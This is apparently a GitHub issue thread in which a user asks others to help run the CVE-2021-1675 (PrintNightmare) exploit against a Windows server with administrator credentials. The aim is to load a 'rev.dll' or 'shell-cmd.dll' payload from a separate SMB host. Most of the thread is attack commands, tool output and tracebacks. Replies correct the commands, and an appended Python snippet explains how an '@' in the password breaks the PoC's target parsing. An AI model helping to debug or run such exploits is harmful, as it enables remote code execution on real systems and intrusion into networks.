Trouble running exploit
mrh3r000 opened this issue · 13 comments
What problem did I have, as described below, when I ran the exploit?
```
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/tmp/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
```
Hope to get help from seniors. Thank you. <3 <3 <3
Can you show your command, @mrh3r000?
This is my command.
```
┌──(root💀kali)-[/tmp]
└─# python3 CVE-2021-1675.py se1300340/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155\smb\shell-cmd.dll'
```
What is se1300340? Is it the DC name or the NetBIOS name? On which Windows are you trying this?
se1300340 is the domain name of the server. I execute it in tmp on Windows.
So it's the DC? Which Windows, 19? And which Samba server do you use to host the DLL payload? Is it smb3?
I use smb3 to save the payload. I don't understand where "/impacket$ ./CVE-2021-1675.py domain.local/dummy:Testing12345@10.1.1.1 '\\10.1.1.10\smb\shell-cmd.dll'" (this is the manual file from another source) is run. Do I perform this step in Windows tmp or in impacket?
Follow #19.
You have to use impacket.
Thank you senior. I will try again. ^_^ @rahultalekar
Hey bro, @rahultalekar .
I have a new problem. Please help me. T_T
```
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155>\smb\rev.dll'
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
```
@mrh3r000 your command is wrong: remove `>` from `\\192.168.40.155>` and then run again.
Try this:
```
python3 CVE-2021-1675.py se1300340/Administrator:'Admin@123'@192.168.40.195 '\\192.168.40.155\smb\shell-cmd.dll'
```
@rahultalekar
So that's the fault. I don't know if there is an error in the .py file?
```
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:'Admin@123'@192.168.40.195 '\\192.168.40.155\smb\rev.dll'
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
```
If you still can't run it, try a password without '@'. He is filtering out '@' in the PoC code, at least I think so.
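An added illustration of the '@' problem raised in the last comment (example code, not part of this issue or of the PoC): the `domain/user:password@host` regex that impacket's example scripts have traditionally used cannot carry an '@' inside the password, so `Admin@123` is cut at the first '@' and the leftover `123@192.168.40.195` is handed to the transport as the host, which then times out. Splitting on the last '@' instead parses it correctly. The regex and the sample target string are assumptions constructed for this example.

```python
import re

# Target regex in the style of impacket's example scripts (assumption about
# the PoC's copy of it). The password group [^@]* stops at the first '@'.
IMPACKET_STYLE_RE = re.compile(r"(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)")


def parse_target_naive(target):
    """Regex-based parse; returns (domain, user, password, host)."""
    return IMPACKET_STYLE_RE.match(target).groups("")


def naive_parse_breaks(target):
    """True when the regex parse would hand a host containing '@' to the
    transport, which is exactly what a password containing '@' causes."""
    return "@" in parse_target_naive(target)[3]


def parse_target_robust(target):
    """Parse [domain/]user[:password]@host so the password may contain '@'
    (and ':' or '/'): only the LAST '@' separates credentials from host,
    the first ':' separates user from password, and a '/' counts as the
    domain separator only when it appears before that ':'."""
    creds, sep, host = target.rpartition("@")
    if not sep:  # no credentials at all, bare host
        return "", "", "", target
    domain = ""
    if "/" in creds.split(":", 1)[0]:
        domain, _, creds = creds.partition("/")
    user, _, password = creds.partition(":")
    return domain, user, password, host


if __name__ == "__main__":
    # Constructed sample matching the command pattern in this thread.
    sample = "se1300340/Administrator:Admin@123@192.168.40.195"
    print("naive :", parse_target_naive(sample))
    print("robust:", parse_target_robust(sample))
    print("naive parse breaks:", naive_parse_breaks(sample))
```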